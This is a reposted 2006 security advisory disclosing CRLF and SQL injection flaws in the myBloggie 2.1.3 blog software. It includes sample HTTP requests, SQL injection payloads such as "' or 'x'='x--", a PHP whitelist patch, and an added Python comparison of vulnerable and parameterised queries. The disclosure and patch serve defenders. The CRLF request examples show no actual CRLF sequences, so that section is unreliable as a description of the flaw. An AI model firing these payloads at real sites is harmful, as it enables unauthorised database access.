
HYSA-2006-008.txt

22 May 2006. Reported by matrix killer. Type: packetstorm. Source: packetstormsecurity.com

myBloggie 2.1.3 CRLF & SQL Injection, Medium severity, vendor unresponsive

------------------------------------------------------  
HYSA-2006-008 h4cky0u.org Advisory 017  
------------------------------------------------------  
Date - Wed May 17 2006  
  
  
TITLE:  
======  
  
myBloggie 2.1.3 CRLF & SQL Injection   
  
  
SEVERITY:   
=========   
  
Medium   
  
  
SOFTWARE:   
=========   
  
myBloggie 2.1.3   
  
http://mybloggie.mywebland.com/   
  
  
INFO:   
=====   
  
myBloggie is considered one of the simplest, most user-friendly yet feature-packed weblog systems available to date.   
  
  
DESCRIPTION:   
============   
  
--==CRLF injection==--   
  
GET /mybloggie/ HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
GET /mybloggie/admin.php HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
GET /mybloggie/index.php HTTP/1.0   
Accept: */*   
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)   
Host: 127.0.0.1:80   
Cookie: PHPSESSID=op0-11{}};q, or something like that   
Connection: Close   
  
--==SQL injection==--   
  
http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id='   
  
Also MurderSkillz discovered a bug in the search function. Here is a proof-of-concept:   
  
1' having '1'='1'--   
  
or   
  
' or 'x'='x--   
  
And a little patch from me:   
  
```php
// Whitelist check: reject any search keyword containing a character outside [A-Za-z0-9_].
// The original patch used ereg(); preg_match() is the PCRE equivalent (ereg was removed in PHP 7).
if (preg_match('/[^A-Za-z0-9_]/', $_POST['keyword'])) {
    echo "Invalid Characters";
    exit;
}

if (isset($_GET['select'])) $select = $_GET['select'];
if (isset($_POST['keyword'])) $keyword = $_POST['keyword'];

// myBloggie's own entity-escaping step follows, unchanged.
$keyword = preg_replace($html_entities_match, $html_entities_replace, $keyword);
//....
```
  
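As an added illustration (not code from the advisory or from myBloggie), the two injection points above and the whitelist patch, rewritten in Python over an in-memory SQLite table that stands in for the post table: the string-built queries that fail the way the PoCs show, beside parameterised versions. The table name, columns and rows are constructed for the example.

```python
import re
import sqlite3

# Constructed sample rows standing in for myBloggie's post table (not its real schema).
SAMPLE_POSTS = [(1, "hello world"), (2, "private draft"), (3, "sql tips")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (post_id INTEGER, subject TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)", SAMPLE_POSTS)
    return conn


def view_post_vulnerable(conn, post_id_param):
    # post_id from the query string spliced straight into SQL: a lone quote (the
    # advisory's PoC) breaks the statement and the database error reaches the user.
    try:
        row = conn.execute(f"SELECT subject FROM posts WHERE post_id = {post_id_param}").fetchone()
    except sqlite3.OperationalError as e:
        return f"SQL error: {e}"
    return row[0] if row else None


def view_post_safe(conn, post_id_param):
    # Hardened: reject anything that is not an integer id, then bind the value.
    if not re.fullmatch(r"[0-9]+", post_id_param):
        return None
    row = conn.execute("SELECT subject FROM posts WHERE post_id = ?", (int(post_id_param),)).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, keyword):
    # Keyword spliced into a LIKE literal. With the advisory's "' or 'x'='x--" the
    # injected quote closes the literal early, leaving "subject LIKE '%'", which
    # matches every row regardless of what follows.
    sql = f"SELECT post_id FROM posts WHERE subject LIKE '%{keyword}%'"
    return [r[0] for r in conn.execute(sql)]


def search_safe(conn, keyword):
    # Hardened: the keyword is a bound parameter, so quotes are just data.
    sql = "SELECT post_id FROM posts WHERE subject LIKE ?"
    return [r[0] for r in conn.execute(sql, (f"%{keyword}%",))]


def keyword_allowed(keyword):
    # The advisory's whitelist, equivalent to its ereg('[^A-Za-z0-9_]') check.
    return re.fullmatch(r"[A-Za-z0-9_]*", keyword) is not None
```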
  
VENDOR STATUS:   
==============   
  
Vendor was contacted but no response has been received to date.   
  
  
CREDITS:   
========   
  
This vulnerability was discovered and researched by   
matrix_killer of h4cky0u Security Forums.   
  
mail : matrix_k at abv.bg   
  
web : http://www.h4cky0u.org   
  
  
Search function SQL injection was discovered by: MurderSkillz  
  
  
Co-Researcher:  
  
h4cky0u of h4cky0u Security Forums.   
  
mail : h4cky0u at gmail.com   
  
web : http://www.h4cky0u.org   
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
  
ORIGINAL ADVISORY:  
==================  
  
http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt  
